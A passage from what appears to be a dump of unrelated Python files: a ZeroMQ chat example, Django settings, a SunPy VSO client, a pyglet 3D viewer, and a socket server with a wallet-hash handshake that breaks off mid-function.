print("publishing", msg, pubsub.publish("/subject/a/", msg))
time.sleep(2)
thread = threading.Thread(target=publish)
thread.start()
thread.join()
subscription.unsubscribe()
api.close()
|
zmq_example.py
|
#!/usr/bin/env python3
# A simple "chat" program to demonstrate the use of ZeroMQ interface
# with the modem application.
# Since the modem currently supports only fixed-length frames,
# they are padded with spaces and stripped after receiving.
FRAME_LENGTH = 100
import zmq, threading, struct
ctx = zmq.Context()
rx = ctx.socket(zmq.SUB)
rx.connect("tcp://localhost:43300")
rx.setsockopt(zmq.SUBSCRIBE, b"")
tx = ctx.socket(zmq.PUB)
tx.connect("tcp://localhost:43301")
def rx_loop():
while True:
rxmsg = rx.recv()
# Parse metadata from the message
metadata = struct.unpack('IIQIffffffffffI', rxmsg[0:64])
timestamp = metadata[2]
data = rxmsg[64:]
# Print it with a timestamp
print("\033[034m%10.2f s: \033[033m%s\033[0m" % (1e-9 * timestamp, data.decode('utf-8','ignore').strip()))
rxthread = threading.Thread(target=rx_loop, daemon=True)
rxthread.start()
while True:
txtext = input()
txpayload = txtext.encode('utf-8','ignore')
# Truncate a too long payload, pad a too short one.
if len(txpayload) >= FRAME_LENGTH:
txframe = txpayload[0:FRAME_LENGTH]
else:
txframe = txpayload + b' ' * (FRAME_LENGTH-len(txpayload))
# Add metadata and send it
tx.send(struct.pack('IIQIffffffffffI', 0, 0, 0, 0, 0,0,0,0, 0,0,0,0,0,0, len(txframe)) + txframe)
|
settings_20210906114611.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the task at 00:01 everyday
schedule.every().day.at("11:47").do(decrease_day_count_and_send_bday_mails)
def func():
while True:
# print("======Runnning==========")
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
__init__.py
|
# -*- coding: utf-8 -*-
# Author: Florian Mayer <florian.mayer@bitsrc.org>
#
# This module was developed with funding provided by
# the ESA Summer of Code (2011).
#
#pylint: disable=W0401,C0103,R0904,W0141
from __future__ import absolute_import
"""
This module provides a wrapper around the VSO API.
"""
import re
import os
import sys
import random
import tempfile
import threading
from datetime import datetime, timedelta
from functools import partial
from collections import defaultdict
from string import ascii_lowercase
from suds import client, TypeNotFound
from sunpy.net import download
from sunpy.net.util import get_filename, slugify
from sunpy.net.attr import and_, Attr
from sunpy.net.vso.attrs import walker, TIMEFORMAT
from sunpy.util.util import to_angstrom, print_table, replacement_filename
from sunpy.time import parse_time
DEFAULT_URL = 'http://docs.virtualsolar.org/WSDL/VSOi_rpc_literal.wsdl'
DEFAULT_PORT = 'nsoVSOi'
RANGE = re.compile(r'(\d+)(\s*-\s*(\d+))?(\s*([a-zA-Z]+))?')
# TODO: Name
class NoData(Exception):
""" Risen for callbacks of VSOClient that are unable to supply
information for the request. """
pass
class _Str(str):
""" Subclass of string that contains a meta attribute for the
record_item associated with the file. """
pass
# ----------------------------------------
class Results(object):
""" Returned by VSOClient.get. Use .wait to wait
for completion of download.
"""
def __init__(self, callback, n=0, done=None):
self.callback = callback
self.n = n
self.map_ = {}
self.done = done
self.evt = threading.Event()
self.errors = []
def submit(self, keys, value):
"""
Parameters
----------
keys : list
names under which to save the value
value : object
value to save
"""
for key in keys:
self.map_[key] = value
self.poke()
def poke(self):
self.n -= 1
""" Signal completion of one item that was waited for. This can be
because it was submitted, because it lead to an error or for any
other reason. """
if not self.n:
if self.done is not None:
self.map_ = self.done(self.map_)
self.callback(self.map_)
self.evt.set()
def require(self, keys):
""" Require that keys be submitted before the Results object is
finished (i.e., wait returns). Returns a callback method that can
be used to submit the result by simply calling it with the result.
keys : list
name of keys under which to save the result
"""
self.n += 1
return partial(self.submit, keys)
def wait(self, timeout=100):
""" Wait for result to be complete and return it. """
# Giving wait a timeout somehow circumvents a CPython bug that the
# call gets ininterruptible.
while not self.evt.wait(timeout):
pass
return self.map_
def add_error(self, exception):
""" Signal a required result cannot be submitted because of an
error. """
self.errors.append(exception)
self.poke()
def _parse_waverange(string):
min_, max_, unit = RANGE.match(string)[::2]
return {
'wave_wavemin': min_,
'wave_wavemax': min_ if max_ is None else max_,
'wave_waveunit': 'Angstrom' if unit is None else unit,
}
def _parse_date(string):
start, end = string.split(' - ')
return {'time_start': start.strip(), 'time_end': end.strip()}
def iter_records(response):
for prov_item in response.provideritem:
if not hasattr(prov_item, 'record') or not prov_item.record:
continue
for record_item in prov_item.record.recorditem:
yield record_item
def iter_errors(response):
for prov_item in response.provideritem:
if not hasattr(prov_item, 'record') or not prov_item.record:
yield prov_item
class QueryResponse(list):
def __init__(self, lst, queryresult=None):
super(QueryResponse, self).__init__(lst)
self.queryresult = queryresult
self.errors = []
def query(self, *query):
""" Furtherly reduce the query response by matching it against
another query, e.g. response.query(attrs.Instrument('aia')). """
query = and_(*query)
return QueryResponse(
attrs.filter_results(query, self), self.queryresult
)
@classmethod
def create(cls, queryresult):
return cls(iter_records(queryresult), queryresult)
def total_size(self):
""" Total size of data in KB. May be less than the actual
size because of inaccurate data providers. """
# Warn about -1 values?
return sum(record.size for record in self if record.size > 0)
def num_records(self):
""" Return number of records. """
return len(self)
def time_range(self):
""" Return total time-range all records span across. """
return (
datetime.strptime(
min(record.time.start for record in self), TIMEFORMAT),
datetime.strptime(
max(record.time.end for record in self), TIMEFORMAT)
)
def show(self):
"""Print out human-readable summary of records retrieved"""
table = [[str(datetime.strptime(record.time.start, TIMEFORMAT)),
str(datetime.strptime(record.time.end, TIMEFORMAT)),
record.source,
record.instrument,
record.extent.type] for record in self]
table.insert(0, ['----------','--------','------','----------','----'])
table.insert(0, ['Start time','End time','Source','Instrument','Type'])
print(print_table(table, colsep = ' ', linesep='\n'))
def add_error(self, exception):
self.errors.append(exception)
class DownloadFailed(Exception):
pass
class MissingInformation(Exception):
pass
class UnknownMethod(Exception):
pass
class MultipleChoices(Exception):
pass
class UnknownVersion(Exception):
pass
class UnknownStatus(Exception):
pass
class VSOClient(object):
""" Main VSO Client. """
method_order = [
'URL-TAR_GZ', 'URL-ZIP', 'URL-TAR', 'URL-FILE', 'URL-packaged'
]
def __init__(self, url=None, port=None, api=None):
if api is None:
if url is None:
url = DEFAULT_URL
if port is None:
port = DEFAULT_PORT
api = client.Client(url)
api.set_options(port=port)
self.api = api
def make(self, type_, **kwargs):
obj = self.api.factory.create(type_)
for k, v in kwargs.iteritems():
split = k.split('__')
tip = split[-1]
rest = split[:-1]
item = obj
for elem in rest:
item = item[elem]
if isinstance(v, dict):
# Do not throw away type information for dicts.
for k, v in v.iteritems():
item[tip][k] = v
else:
item[tip] = v
return obj
def query(self, *query):
""" Query data from the VSO with the new API. Takes a variable number
of attributes as parameter, which are chained together using AND.
The new query language allows complex queries to be easily formed.
Examples
--------
Query all data from eit or aia between 2010-01-01T00:00 and
2010-01-01T01:00.
>>> client.query(
... vso.Time(datetime(2010, 1, 1), datetime(2010, 1, 1, 1)),
... vso.Instrument('eit') | vso.Instrument('aia')
... )
Returns
-------
out : :py:class:`QueryResult` (enhanced list) of matched items. Return value of same type as the one of :py:meth:`VSOClient.query`.
"""
query = and_(*query)
responses = []
for block in walker.create(query, self.api):
try:
responses.append(
self.api.service.Query(
self.make('QueryRequest', block=block)
)
)
except TypeNotFound:
pass
except Exception as ex:
response = QueryResponse.create(self.merge(responses))
response.add_error(ex)
return QueryResponse.create(self.merge(responses))
def merge(self, queryresponses):
if len(queryresponses) == 1:
return queryresponses[0]
fileids = set()
providers = {}
for queryresponse in queryresponses:
for provideritem in queryresponse.provideritem:
provider = provideritem.provider
if not hasattr(provideritem, 'record'):
continue
if not hasattr(provideritem.record, 'recorditem'):
continue
if not provideritem.provider in providers:
providers[provider] = provideritem
fileids |= set(
record_item.fileid
for record_item in provideritem.record.recorditem
)
else:
for record_item in provideritem.record.recorditem:
if record_item.fileid not in fileids:
fileids.add(record_item.fileid)
providers[provider].record.recorditem.append(
record_item
)
providers[provider].no_of_records_found += 1
providers[provider].no_of_records_returned += 1
return self.make('QueryResponse', provideritem=providers.values())
@staticmethod
def mk_filename(pattern, response, sock, url, overwrite=False):
name = get_filename(sock, url)
if not name:
if not isinstance(response.fileid, unicode):
name = unicode(response.fileid, "ascii", "ignore")
else:
name = response.fileid
fs_encoding = sys.getfilesystemencoding()
if fs_encoding is None:
fs_encoding = "ascii"
name = name.encode(fs_encoding, "ignore")
if not name:
name = "file"
fname = pattern.format(file=name, **dict(response))
if not overwrite and os.path.exists(fname):
fname = replacement_filename(fname)
dir_ = os.path.dirname(fname)
if not os.path.exists(dir_):
os.makedirs(dir_)
return fname
# pylint: disable=R0914
def query_legacy(self, tstart=None, tend=None, **kwargs):
"""
Query data from the VSO mocking the IDL API as close as possible.
Either tstart and tend or date_start and date_end or date have
to be supplied.
Parameters
----------
tstart : datetime.datetime
Start of the time-range in which records are searched.
tend : datetime.datetime
Start of the time-range in which records are searched.
date : str
(start date) - (end date)
start_date : datetime
the start date
end_date : datetime
the end date
wave : str
(min) - (max) (unit)
min_wave : str
minimum spectral range
max_wave : str
maximum spectral range
unit_wave : str
spectral range units (Angstrom, GHz, keV)
extent : str
VSO 'extent type' ... (FULLDISK, CORONA, LIMB, etc)
physobj : str
VSO 'physical observable'
provider : str
VSO ID for the data provider (SDAC, NSO, SHA, MSU, etc)
source : str
spacecraft or observatory (SOHO, YOHKOH, BBSO, etc)
synonyms : spacecraft, observatory
instrument : str
instrument ID (EIT, SXI-0, SXT, etc)
synonyms : telescope, inst
detector : str
detector ID (C3, EUVI, COR2, etc.)
layout : str
layout of the data (image, spectrum, time_series, etc.)
level : str
level of the data product (numeric range, see below)
pixels : str
number of pixels (numeric range, see below)
resolution : str
effective resolution (1 = full, 0.5 = 2x2 binned, etc)
numeric range, see below.
pscale : str
pixel scale, in arcseconds (numeric range, see below)
near_time : datetime
return record closest to the time. See below.
sample : int
attempt to return only one record per SAMPLE seconds. See below.
Numeric Ranges:
- May be entered as a string or any numeric type for equality matching
- May be a string of the format '(min) - (max)' for range matching
- May be a string of the form '(operator) (number)' where operator is one of: lt gt le ge < > <= >=
Examples
--------
Query all data from eit between 2010-01-01T00:00 and
2010-01-01T01:00.
>>> qr = client.query_legacy(
... datetime(2010, 1, 1), datetime(2010, 1, 1, 1), instrument='eit')
Returns
-------
out : :py:class:`QueryResult` (enhanced list) of matched items. Return value of same type as the one of :py:class:`VSOClient.query`.
"""
sdk = lambda key: lambda value: {key: value}
ALIASES = {
'wave_min': sdk('wave_wavemin'),
'wave_max': sdk('wave_wavemax'),
'wave_type': sdk('wave_wavetype'),
'wave_unit': sdk('wave_waveunit'),
'min_wave': sdk('wave_wavemin'),
'max_wave': sdk('wave_wavemax'),
'type_wave': sdk('wave_wavetype'),
'unit_wave': sdk('wave_waveunit'),
'wave': _parse_waverange,
'inst': sdk('instrument'),
'telescope': sdk('instrument'),
'spacecraft': sdk('source'),
'observatory': sdk('source'),
'start_date': sdk('time_start'),
'end_date': sdk('time_end'),
'start': sdk('time_start'),
'end': sdk('time_end'),
'near_time': sdk('time_near'),
'date': _parse_date,
'layout': sdk('datatype'),
}
kwargs.update({'time_start': tstart, 'time_end': tend})
queryreq = self.api.factory.create('QueryRequest')
for key, value in kwargs.iteritems():
if key.startswith('time'):
value = parse_time(value).strftime(TIMEFORMAT)
for k, v in ALIASES.get(key, sdk(key))(value).iteritems():
attr = k.split('_')
lst = attr[-1]
rest = attr[:-1]
# pylint: disable=E1103
item = queryreq.block
for elem in rest:
try:
item = item[elem]
except KeyError:
raise ValueError("Unexpected argument %s." % key)
if lst not in item:
raise ValueError("Unexpected argument %s." % key)
if item[lst]:
raise ValueError("Got multiple values for %s." % k)
item[lst] = v
try:
return QueryResponse.create(self.api.service.Query(queryreq))
except TypeNotFound:
return QueryResponse([])
def latest(self):
""" Return newest record (limited to last week). """
return self.query_legacy(
datetime.utcnow() - timedelta(7),
datetime.utcnow(),
time_near=datetime.utcnow()
)
def get(self, query_response, path=None, methods=('URL-FILE',), downloader=None):
"""
Download data specified in the query_response.
Parameters
----------
query_response : sunpy.net.vso.QueryResponse
QueryResponse containing the items to be downloaded.
path : str
Specify where the data is to be downloaded. Can refer to arbitrary
fields of the QueryResponseItem (instrument, source, time, ...) via
string formatting, moreover the file-name of the file downloaded can
be refered to as file, e.g.
"{source}/{instrument}/{time.start}/{file}".
methods : {list of str}
Methods acceptable to user.
downloader : sunpy.net.downloader.Downloader
Downloader used to download the data.
Returns
-------
out : :py:class:`Results` object that supplies a list of filenames with meta attributes containing the respective QueryResponse.
Examples
--------
>>> res = get(qr).wait()
"""
if downloader is None:
downloader = download.Downloader()
thread = threading.Thread(target=downloader.reactor.run)
thread.daemon = True
thread.start()
res = Results(
lambda _: downloader.reactor.stop(), 1,
lambda mp: self.link(query_response, mp)
)
else:
res = Results(
lambda _: None, 1, lambda mp: self.link(query_response, mp)
)
if path is None:
path = os.path.join(tempfile.mkdtemp(), '{file}')
fileids = VSOClient.by_fileid(query_response)
if not fileids:
res.poke()
return res
self.download_all(
self.api.service.GetData(
self.make_getdatarequest(query_response, methods)
),
methods, downloader, path,
fileids, res
)
res.poke()
return res
@staticmethod
def link(query_response, map_):
if not map_:
return []
ret = []
for record_item in query_response:
try:
item = _Str(map_[record_item.fileid]['path'])
except KeyError:
continue
# pylint: disable=W0201
item.meta = record_item
ret.append(item)
return ret
def make_getdatarequest(self, response, methods=None):
if methods is None:
methods = self.method_order + ['URL']
return self.create_getdatarequest(
dict((k, [x.fileid for x in v])
for k, v in self.by_provider(response).iteritems()),
methods
)
def create_getdatarequest(self, map_, methods, info=None):
if info is None:
info = {}
return self.make(
'VSOGetDataRequest',
request__method__methodtype=methods,
request__info=info,
request__datacontainer__datarequestitem=[
self.make('DataRequestItem', provider=k, fileiditem__fileid=[v])
for k, v in map_.iteritems()
]
)
# pylint: disable=R0913,R0912
def download_all(self, response, methods, dw, path, qr, res, info=None):
GET_VERSION = [
('0.8', (5, 8)),
('0.7', (1, 4)),
('0.6', (0, 3)),
]
for dresponse in response.getdataresponseitem:
for version, (from_, to) in GET_VERSION:
if getattr(dresponse, version, '0.6') >= version:
break
else:
res.add_error(UnknownVersion(dresponse))
continue
# If from_ and to are uninitialized, the else block of the loop
# continues the outer loop and thus this code is never reached.
# pylint: disable=W0631
code = (
dresponse.status[from_:to]
if hasattr(dresponse, 'status') else '200'
)
if code == '200':
for dataitem in dresponse.getdataitem.dataitem:
try:
self.download(
dresponse.method.methodtype[0],
dataitem.url,
dw,
res.require(map(str, dataitem.fileiditem.fileid)),
res.add_error,
path,
qr[dataitem.fileiditem.fileid[0]]
)
except NoData:
res.add_error(DownloadFailed(dresponse))
continue
except Exception:
# FIXME: Is this a good idea?
res.add_error(DownloadFailed(dresponse))
elif code == '300' or code == '412' or code == '405':
if code == '300':
try:
methods = self.multiple_choices(
dresponse.method.methodtype, dresponse
)
except NoData:
res.add_error(MultipleChoices(dresponse))
continue
elif code == '412':
try:
info = self.missing_information(
info, dresponse.info
)
except NoData:
res.add_error(MissingInformation(dresponse))
continue
elif code == '405':
try:
methods = self.unknown_method(dresponse)
except NoData:
res.add_error(UnknownMethod(dresponse))
continue
files = []
for dataitem in dresponse.getdataitem.dataitem:
files.extend(dataitem.fileiditem.fileid)
request = self.create_getdatarequest(
{dresponse.provider: files}, methods, info
)
self.download_all(
self.api.service.GetData(request), methods, dw, path,
qr, res, info
)
else:
res.add_error(UnknownStatus(dresponse))
def download(self, method, url, dw, callback, errback, *args):
""" Override to costumize download action. """
if method.startswith('URL'):
return dw.reactor.call_sync(
partial(dw.download, url, partial(self.mk_filename, *args),
callback, errback)
)
raise NoData
@staticmethod
def by_provider(response):
map_ = defaultdict(list)
for record in response:
map_[record.provider].append(record)
return map_
@staticmethod
def by_fileid(response):
return dict(
(record.fileid, record) for record in response
)
# pylint: disable=W0613
def multiple_choices(self, choices, response):
""" Override to pick between multiple download choices. """
for elem in self.method_order:
if elem in choices:
return [elem]
raise NoData
# pylint: disable=W0613
def missing_information(self, info, field):
""" Override to provide missing information. """
raise NoData
# pylint: disable=W0613
def unknown_method(self, response):
""" Override to pick a new method if the current one is unknown. """
raise NoData
class InteractiveVSOClient(VSOClient):
""" Client for use in the REPL. Prompts user for data if required. """
def multiple_choices(self, choices, response):
while True:
for n, elem in enumerate(choices):
print "(%d) %s" % (n + 1, elem)
try:
choice = raw_input("Method number: ")
except KeyboardInterrupt:
raise NoData
if not choice:
raise NoData
try:
choice = int(choice) - 1
except ValueError:
continue
if choice == -1:
raise NoData
elif choice >= 0:
try:
return [choices[choice]]
except IndexError:
continue
def missing_information(self, info, field):
choice = raw_input(field + ': ')
if not choice:
raise NoData
return choice
def search(self, *args, **kwargs):
""" When passed an Attr object, perform new-style query;
otherwise, perform legacy query.
"""
if isinstance(args[0], Attr):
return self.query(*args)
else:
return self.query_legacy(*args, **kwargs)
def get(self, query_response, path=None, methods=('URL-FILE',), downloader=None):
if path is not None:
path = os.path.abspath(os.path.expanduser(path))
if os.path.exists(path) and os.path.isdir(path):
path = os.path.join(path, '{file}')
return VSOClient.get(self, query_response, path, methods, downloader)
g_client = None
def search(*args, **kwargs):
# pylint: disable=W0603
global g_client
if g_client is None:
g_client = InteractiveVSOClient()
return g_client.search(*args, **kwargs)
search.__doc__ = InteractiveVSOClient.search.__doc__
def get(query_response, path=None, methods=('URL-FILE',), downloader=None):
# pylint: disable=W0603
global g_client
if g_client is None:
g_client = InteractiveVSOClient()
return g_client.get(query_response, path, methods, downloader)
get.__doc__ = VSOClient.get.__doc__
if __name__ == "__main__":
from sunpy.net import vso
client = VSOClient()
result = client.query(
vso.attrs.Time((2011, 1, 1), (2011, 1, 1, 10)),
vso.attrs.Instrument('aia')
)
#res = client.get(result, path="/download/path").wait()
|
app.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import tricks
import rig
import time
from multiprocessing import Process, Manager
from pyglet.gl import *
from pyglet.window import key
from pyglet import clock
from tricks import *
from os.path import sep
from math import sqrt
from copy import deepcopy
import space
from layout import Camera
def setup_light():
""" Параметры источников света
ambient - фоновый (всенаправленный)
difuuze - диффузный направленный
specular - зеркальный
"""
glLightModelfv(GL_LIGHT_MODEL_AMBIENT, (GLfloat * 4)(0.3, 0.1, 0.1, 1.0))
# не освещать внутренние поверхности объектов
glLightModeli(GL_LIGHT_MODEL_TWO_SIDE, GL_FALSE)
# основной - желтоватый
glLightfv(GL_LIGHT0, GL_DIFFUSE, (GLfloat * 4)(1.45, 1.45, 1.30, 1.00))
glLightfv(GL_LIGHT0, GL_AMBIENT, (GLfloat * 4)(0.30, 0.30, 0.30, 1.00))
glLightfv(GL_LIGHT0, GL_SPECULAR, (GLfloat * 4)(0.30, 0.30, 0.30, 1.00))
# задняя подсветка - серая
glLightfv(GL_LIGHT1, GL_DIFFUSE, (GLfloat * 4)(1.0, 1.0, 1.0, 1.0))
glLightfv(GL_LIGHT1, GL_AMBIENT, (GLfloat * 4)(0.0, 0.0, 0.0, 1.0))
glLightfv(GL_LIGHT1, GL_SPECULAR, (GLfloat * 4)(0.0, 0.0, 0.0, 1.0))
glEnable(GL_LIGHT0)
glEnable(GL_LIGHT1)
def set_light():
""" Позиция источников света
"""
glLightfv(GL_LIGHT0, GL_POSITION, glType(GLfloat, -6.0, 6.40, -5.5, 0.0))
glLightfv(GL_LIGHT1, GL_POSITION, glType(GLfloat, 5.0, -2.5, 6.0, 0.0))
def set_fog():
glEnable(GL_FOG) # активировать режим тумана
glFogi(GL_FOG_MODE, GL_LINEAR) # закон смешения тумана
glFogf(GL_FOG_START, 60) # начало тумана
glFogf(GL_FOG_END, 100) # конец тумана
# цвет дымки
glFogfv(GL_FOG_COLOR, (GLfloat * 4)(0.5, 0.7, 1.0, 1))
glFogf(GL_FOG_DENSITY, 0.7) # плотность тумана
glHint(GL_FOG_HINT, GL_DONT_CARE) # GL_DONT_CARE | GL_NICEST | GL_FASTEST
def set_2d():
width, height = window.get_size()
glDisable(GL_DEPTH_TEST)
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, width, 0, height, -1, 1)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glDisable(GL_LIGHTING)
def set_3d():
glEnable(GL_LIGHTING)
glEnable(GL_DEPTH_TEST)
glDepthFunc(GL_LESS)
glEnable(GL_CULL_FACE)
glFrontFace(GL_CCW)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glMatrixMode(GL_PROJECTION | GL_MODELVIEW)
glLoadIdentity()
width, height = window.get_size()
gluPerspective(70.0, width / height, 0.1, 100.0)
set_light()
def draw_focused_unit(point):
""" Подсвечивает рамкой блок, на который направлен взгляд(курсор),
только если наблюдатель не находится внутри существующего ("твердого") блока.
:param point: tuple
:return: void
"""
x, y, z = camera.myPos
if (round(x), round(y), round(z)) not in rig.active_units:
glDisable(GL_LIGHTING)
pyglet.gl.glColor4f(0.9, 0.9, 1.0, 0.1)
pyglet.graphics.draw(24, GL_QUADS, ('v3f/static', tricks.get_frame_vertices(point)))
glEnable(GL_LIGHTING)
def draw_2d_content():
az = str('%.3f' % round(camera.azim, 3))
ze = str('%.3f' % round(camera.zenit, 3))
to = str(camera.look_to())
text = "azim: %s, zenit: %s, look to: %s" % (az, ze, to)
set_2d()
label = pyglet.text.Label(text, font_name='DejaVu Sans Mono',
font_size=10, color=(45, 45, 245, 255), x=20, y=window.height - 18,
anchor_x='left', anchor_y='top')
info_quad(window.height, 370, 36)
show_sight(int(window.width/2), int(window.height/2))
label.draw()
def app_init():
pyglet.font.add_file("pics%sttf%sDejaVuSansMono.ttf" % (sep, sep))
pyglet.font.load('DejaVu Sans Mono')
glPolygonMode(GL_FRONT, GL_FILL)
glEnable(GL_BLEND) # включить поддержку прозрачности
# Управление массивом элеменов 3D пространства
rig.space_batch = pyglet.graphics.Batch()
def calc_remove(units_removing, points_checking):
""" Обновление состава активных элементов отображения трехмерного пространства:
- элементы/блоки,расстояние до которых от наблюдателя больше границы видимости - удаляются,
(- при сдвиге границы видимости новые видимые блоки должны добавляться)
:units_removing: list
:points_checking: list
:return: void
"""
far_max = 50.0
"""
while True:
if points_checking:
# сamera.location()
x1, y1, z1 = points_checking.pop(-1)
while points_checking:
x2, y2, z2 = points_checking.pop()
# контролируем дистанцию только по горизотали
distance = sqrt((x2-x1)**2 +(z2-z1)**2)
if distance > far_max:
units_removing.append((x2, y2, z2))
"""
if __name__ == '__main__':
window = window_open()
camera = Camera()
# import time
# start_run = time.time()
# print("init time: %f" % (time.time() - start_run))
app_init()
world = space.World()
units_init = deepcopy(rig.active_units)
setup_light()
set_fog()
# Динамическое изменение элементов активного пространства
from multiprocessing import Manager
units_removing = Manager().list()
points_checking = Manager().list()
p = Process(target=calc_remove, args=(units_removing, points_checking))
p.start()
# текущее значение ftp можно получить через = fps.clock.get_fps()
fps = clock.ClockDisplay(format='%(fps).2f', color=(1.0, 1.0, 1.0, 0.8))
@window.event
def on_key_press(symbol, modifiers):
key_pressed_point = camera.location()
if symbol == key.ESCAPE:
window.set_exclusive_mouse(False)
else:
camera.key_press(symbol, modifiers)
# Если нет активной очереди на удаление, то добавим новую
#if not units_removing:
# points_checking.extend(rig.active_units.keys())
# points_checking.append(key_pressed_point)
@window.event
def on_draw():
gluLookAt(*camera.LookSet)
set_3d()
world.draw()
p = camera.look_to()
if p:
draw_focused_unit(p)
draw_2d_content()
fps.draw()
# Если имеются элементы загрузки
if units_init:
l = min(len(units_init), 500)
for x in range(l):
p, texture_id = units_init.popitem()
if type(texture_id) == int:
rig.active_units[p] = space.Unit(p, texture_id)
"""
# Если имеются элементы, вышедшие за границу видимости, то их следует
# удалить из рендеринга
if units_removing:
# Чтобы не тормозить движение камеры - удаляем частями по 50 элементов
# при каждой перерисовке экрана
l = min(len(units_removing), 50)
for x in range(l):
p = units_removing.pop()
u = rig.active_units.pop(p)
u.delete()
"""
@window.event
def on_mouse_motion(x, y, dx, dy):
camera.turn_look(x, y, dx, dy)
@window.event
def on_mouse_press(x, y, button, modifiers):
look_to = camera.look_to()
if look_to and button == pyglet.window.mouse.RIGHT:
e = rig.active_units.pop(look_to)
e.delete()
@window.event
def on_key_release(symbol, modifiers):
camera.key_release(symbol, modifiers)
pyglet.clock.schedule(camera.stream)
pyglet.app.run()
p.terminate()
p.join()
|
tpls_server.py
|
# server.py
import logging
logging.basicConfig(level=logging.DEBUG, format='%(message)s', )
import datetime as dt
import logging
import sys
import socketserver
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
local_ip = "192.168.1.5"
n_port = 1234
tw = ['22670bf1b10545e46f7d797c8e4bd7a77af1bb667f7e864aaca07fad65439f84','951c49bc88ce9a2cc31d4470423590a7c0bedbef953a06a72e6b5d4f74731ed6', '56b8ba882b6aeeb7fa43f9125d8d2909b8a734f82b46b67b3809105a28cfb05d']
trusted_wallet_hash = tw
handshake = []
run = True
def chash_0(input_string):
handshake.clear()
autolog('chash_0: input')
packet = input_string
for i in range(0, len(tw)) or packet == tw[i]:
if packet != tw[i]:
cs = 'ERROR: CONNECTION UNSUCCESSFUL'
handshake.clear()
handshake.append(0)
autolog(cs)
autolog(handshake)
return cs
elif packet == tw[i]:
cs = 'CONNECTION SUCCESSFUL'
handshake.clear()
handshake.append(1)
autolog(cs)
autolog(handshake)
return cs
else:
cs = 'ERROR: CONNECTION UNSUCCESSFUL'
handshake.clear()
handshake.append(0)
autolog(cs)
autolog(handshake)
return cs
def client_thread(conn, ip, port, MAX_BUFFER_SIZE = 4096):
# incoming user wallet hash, id of user/node
init_chash_b = conn.recv(MAX_BUFFER_SIZE)
autolog('client_thread: ')
# MAX_BUFFER_SIZE is how big the message can be
import sys
siz = sys.getsizeof(init_chash_b)
if siz >= MAX_BUFFER_SIZE:
print("The length of input is probably too long: {}".format(siz))
autolog('client_thread: ')
# decode incoming user hash
chash_0_r = init_chash_b.decode("utf8")
autolog(chash_0_r)
# analyze incoming user hash
res = chash_0(chash_0_r)
autolog('chash -> analyer')
vysl = res.encode("utf8") # encode the result string
conn.sendall(vysl) # send it to client
if handshake[0] == 1:
# fid tx
autolog('FID INCOMING')
data_bytes = conn.recv(MAX_BUFFER_SIZE)
siz = sys.getsizeof(init_chash_b)
if siz >= MAX_BUFFER_SIZE:
print("The length of input is probably too long: {}".format(siz))
# decode the FID
data = data_bytes.decode('utf-8')
autolog(data)
fid_analyze(data)
# responce after fid execute
replyb = 'DATA TRANSFER COMPLETE'
conn.sendall(replyb.encode('utf-8'))
else:
